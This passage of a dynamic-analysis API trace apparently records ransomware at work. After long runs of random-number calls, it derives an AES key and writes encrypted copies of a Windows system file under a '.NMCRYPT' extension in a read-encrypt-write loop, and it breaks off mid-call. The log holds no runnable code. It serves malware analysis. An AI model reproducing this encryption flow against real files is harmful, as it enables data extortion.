dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.766] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.767] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.768] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.769] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.770] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.770] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0160.770] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0160.770] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.770] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad478) returned 1 [0160.770] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0160.770] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0160.770] wcslen (_String="\\\\?\\") returned 0x4 [0160.770] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad638) returned 1 [0160.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0160.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0160.917] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0160.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.917] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.919] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.919] GetLastError () returned 0x0 [0160.919] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.944] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.945] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.945] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.945] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.945] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.945] CryptEncrypt (in: hKey=0x9ad638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.945] GetLastError () returned 0x0 [0160.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.945] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, 